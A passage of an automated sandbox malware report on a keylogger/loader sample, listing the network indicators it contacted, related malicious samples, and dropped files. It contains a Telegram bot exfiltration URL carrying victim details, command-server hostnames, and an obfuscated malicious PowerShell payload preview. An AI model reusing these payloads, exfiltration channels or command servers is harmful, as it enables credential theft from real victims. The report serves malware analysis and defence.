https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1740283759.0000000005837000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 00000004.00000002.2609054481.0000000022C09000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com	msiexec.exe, 00000004.00000003.1800996824.0000000007079000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1801091412.00000000070AE000.00000004.00000020.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enT	msiexec.exe, 00000004.00000002.2609054481.0000000022C0E000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1736319849.00000000047D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000004.00000002.2609054481.0000000022ACC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/	msiexec.exe, 00000004.00000002.2609054481.0000000022C3F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022C30000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1740283759.0000000005837000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000002.00000002.1736319849.0000000004925000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1736319849.0000000004925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1742599713.0000000006EE0000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.1736319849.0000000004925000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1736319849.0000000004925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1742599713.0000000006EE0000.00000004.00000020.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtabv20-	msiexec.exe, 00000004.00000002.2611051313.0000000023BD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D96000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1740283759.0000000005837000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org?q=	msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	msiexec.exe, 00000004.00000002.2594583004.0000000007072000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	msiexec.exe, 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.microsoft.	powershell.exe, 00000002.00000002.1742599713.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	cqWZtEH4eJ.exe, cqWZtEH4eJ.exe.2.dr	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000004.00000002.2609054481.0000000022B62000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1736319849.0000000004925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1742599713.0000000006EE0000.00000004.00000020.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	msiexec.exe, 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/v20	msiexec.exe, 00000004.00000002.2611051313.0000000023BD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D96000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_Error	cqWZtEH4eJ.exe, cqWZtEH4eJ.exe.2.dr	false	high
http://anotherarmy.dns.army:8081	msiexec.exe, 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.1736319849.0000000004925000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 00000004.00000002.2609054481.0000000022AF6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022B62000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022B3C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	msiexec.exe, 00000004.00000002.2609054481.0000000022ACC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022B62000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022B3C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/-	msiexec.exe, 00000004.00000002.2594583004.0000000006FFA000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20a	msiexec.exe, 00000004.00000002.2609054481.0000000022B62000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://gemini.google.com/app?q=	msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
142.250.181.238	drive.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.16.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
142.250.184.225	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1632347
Start date and time:	2025-03-07 22:32:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	cqWZtEH4eJ.exe renamed because original name is a hash value
Original Sample Name:	1eface4a669563e22a5aa35131e3c3b3da273361c13bdf989fb5b2049fbcae4b.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/23@5/5
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 162 Number of non-executed functions: 70
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, conhost.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, c.pki.goog
Execution Graph export aborted for target powershell.exe, PID 5288 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
16:33:17	API Interceptor	41x Sleep call for process: powershell.exe modified
16:34:12	API Interceptor	62661x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	AEo2XQmxqZ.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	CWu89IbJQw.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	TfRJR0Y3uW.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	DNNueAb5UZ.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	NmuA605dM4.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	4PYRGCo1Di.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	XiJhd7Lx30.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	UFOiZapHGS.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PvAmrCZENy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	bvhauD4o49.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	0CBJ3aLKx0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	CWu89IbJQw.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	DayVXJx1km.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	3c638k0NJx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	drRbNknjyb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	3GrfjMY0pG.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	TMRASkMVAy.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	4PYRGCo1Di.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	bvhauD4o49.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.32.1
	0CBJ3aLKx0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	26YzPy68Rz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	AEo2XQmxqZ.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	l9inNHJqHS.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	CWu89IbJQw.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	tSftorqHTy.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	O20L0ptxGs.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	DayVXJx1km.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.64.1
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.32.1
api.telegram.org	bvhauD4o49.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	0CBJ3aLKx0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	CWu89IbJQw.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DayVXJx1km.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	3c638k0NJx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	drRbNknjyb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	3GrfjMY0pG.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TMRASkMVAy.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	4PYRGCo1Di.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
checkip.dyndns.com	bvhauD4o49.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	0CBJ3aLKx0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	26YzPy68Rz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	AEo2XQmxqZ.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	l9inNHJqHS.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	CWu89IbJQw.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	tSftorqHTy.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.247.73
	O20L0ptxGs.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	DayVXJx1km.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	bvhauD4o49.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	0CBJ3aLKx0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	CWu89IbJQw.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DayVXJx1km.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	3c638k0NJx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	KMSpico.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	drRbNknjyb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	3GrfjMY0pG.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	KMSpico.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
CLOUDFLARENETUS	jki-dragon-release-online-setup.exe	Get hash	malicious	Unknown	Browse	104.17.118.104
	yXsTZ347KJ.exe	Get hash	malicious	Unknown	Browse	162.159.130.233
	bvhauD4o49.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.32.1
	0CBJ3aLKx0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	26YzPy68Rz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	AEo2XQmxqZ.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	l9inNHJqHS.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	tmezkNPazz.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	CWu89IbJQw.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	https://live.dot.vu/p/dholcomb/landing-page-trends-report/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.17.25.14
UTMEMUS	AEo2XQmxqZ.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	l9inNHJqHS.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	CWu89IbJQw.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	tSftorqHTy.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.247.73
	DayVXJx1km.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	cexqIzhyvM.exe	Get hash	malicious	GuLoader	Browse	132.226.247.73
	drRbNknjyb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	TfRJR0Y3uW.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	DNNueAb5UZ.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	bvhauD4o49.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.16.1
	0CBJ3aLKx0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	26YzPy68Rz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.16.1
	AEo2XQmxqZ.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	l9inNHJqHS.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	CWu89IbJQw.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	tSftorqHTy.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	Z6ojPnRBp1.exe	Get hash	malicious	RedLine	Browse	104.21.16.1
	O20L0ptxGs.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	DayVXJx1km.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.16.1
3b5074b1b5d032e5620f69f9f700ff0e	yXsTZ347KJ.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	bvhauD4o49.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	0CBJ3aLKx0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	CWu89IbJQw.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Jynj1RQC49.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Jynj1RQC49.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	DayVXJx1km.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	3c638k0NJx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	drRbNknjyb.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	sR4s2qQF6I.exe	Get hash	malicious	GuLoader	Browse	142.250.184.225 142.250.181.238
	VnaQJI0ScP.exe	Get hash	malicious	GuLoader	Browse	142.250.184.225 142.250.181.238
	bvhauD4o49.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.184.225 142.250.181.238
	26YzPy68Rz.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.184.225 142.250.181.238
	CWu89IbJQw.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	142.250.184.225 142.250.181.238
	R513Lbg4Qu.exe	Get hash	malicious	GuLoader	Browse	142.250.184.225 142.250.181.238
	R513Lbg4Qu.exe	Get hash	malicious	GuLoader	Browse	142.250.184.225 142.250.181.238
	nicegirlwanttokissingmylipswithnicely.hta	Get hash	malicious	Remcos	Browse	142.250.184.225 142.250.181.238
	kWN9R2xr8B.lnk	Get hash	malicious	Emmenhtal Loader	Browse	142.250.184.225 142.250.181.238
	DayVXJx1km.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.184.225 142.250.181.238

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25qgrsze.nuv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gxbtpfo.b0u.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0mso0jq.2m3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pyrljxmn.2wf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Circumdenudation.Spi

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	Unicode text, UTF-8 text, with very long lines (3143), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	52898
Entropy (8bit):	5.343812320257525
Encrypted:	false
SSDEEP:	768:o6yelrqpRFdkruLUNWsaRV/nLR7TVmUfhUcP8nZO1jOt4gBFkWFEVAX8EzzXC:nFlYfdkrViV97MUZenY1jONB/e++
MD5:	43196E80A80C37AC4084CAA0F49C16B7
SHA1:	D6DFFB4CD1DD7DFF39C6F37390443F867CEDF7C1
SHA-256:	D198B56C946043690F2A7BED29210F9315F4A944235C218065A384B04EA4C438
SHA-512:	01CAC5B4CB979C6143DEA1EB6DAE5A921BD969173600D99E5B1763CB06452164B60257145472709566B745978964BA6B16AFEC798450E8E93591DC2EE8C88BA3
Malicious:	true
Preview:	$Gurgingnerudition=$Salvelsesfuldestes;........$Hears = @'.Machi. D st$Ant,mRDjvelgBlance MillrNeph rSv ndiattengApostsTvrvetLvsan= Acco$BlodbVDiktaiH pherVanhekForhaeR ilrmThrobaBeworaUgerndHypereakselsUdhus;Brys . etopf BehyuAnt mngenbrcVarmet cciiSyfiloFornyn Clot DdsstN An.noShrienRi deaFalkon oppeaAnen rGrea cRheumh PreciPervecVid raCentrlCaboclac deyMicro2Dissh0 ende9Aarri Aflse( Hypn$ yganP B freWh senInflun ftera .rmmm alcieTroub,Dauph$AssocDAn tty AfhnsKle.ke K rdn ohnsTr,ll) Chor Tre.{Nonfi.Forur.Hydat$ Du nfFjerneDdmanrGn tonAnbefi KurseBrneps remft Proc Dryop(TurdiTEv,lduSedenr Barrt ekal Histimyelen SpilgMi li la en' TeksFKujonaDa bsk GausiSty.irKogsa$ randhSitdiuBanans pndea eptrSubanP ForsESlovek N.nisUdtrtt krobrVersieViolaMMekaniIn anlKlbnijAlter.Forstn Pe fMSkumgeapportBritahTvekayKlinknA,benCJazz lOverdaTaalmiEthnor Ivria OffiO FalcvKabineB.ederunrepfDamefmSkjteBreproe Bo skSho e. Sk ia Verte,ales T.edEFllesxKios c SwifeSmalb Kjest Ev nlPBygh o NonerUnsupt,pol

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Fanfaren36.Aff

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
File Type:	data
Category:	dropped
Size (bytes):	326364
Entropy (8bit):	7.6753527244476
Encrypted:	false
SSDEEP:	6144:SOt7R36ij7/EUn9lVdi5qRZipw5RLuZ7BlsjV6t2GXKAGXHnFPPHJeB71CNPq3D:Sqd3z7nn90oRZipIRa1TwV6tfXRGXlP8
MD5:	6219294C1ADA44EBC090C81ABF50AFFD
SHA1:	19E580FE0C98344CC4997B303A713760329FD601
SHA-256:	9F3B32AD3ACC17E88D7D700CC567DD54B8C500B093B43A4521D51CF4029A52F5
SHA-512:	1D29D85FAB1AC32DC8B96670CE2895EA96E5692E3162DB2094E962C7CBCA77A01AF195AD7255A0D9CF0AE1024E00F7CCC02BE42AB2FC8725B779EB31226A8F62
Malicious:	false
Preview:	....hh...\|.AAA...zz...............u........qq...................``......v.ccc....."...........UUUUU..............1...........55.......................T........BB.............................zzz.................ww.....................1.................k........o............55................d...-.......9....-..ee.........................====.........................3..........k...nn.\\................;;;;.t.@@@@@..............999..KKK. ........OO...........2................................v....................^^^......V.N.l..<..................................'.............6...#.....DDDD.p................e...M.a.N.............................P.........................9...........................aa...]]]]........d......;;;;..................................www.......**...... .........;...............................[.$$$$$$$$$$............#.ZZ......xxx...................^^..."...B.3..++++......,...........O....p.e.e............`......~.g.... ..................G.W.$..j........R...rrr...\|\|

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Fossil.jpg

Download File

Process:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
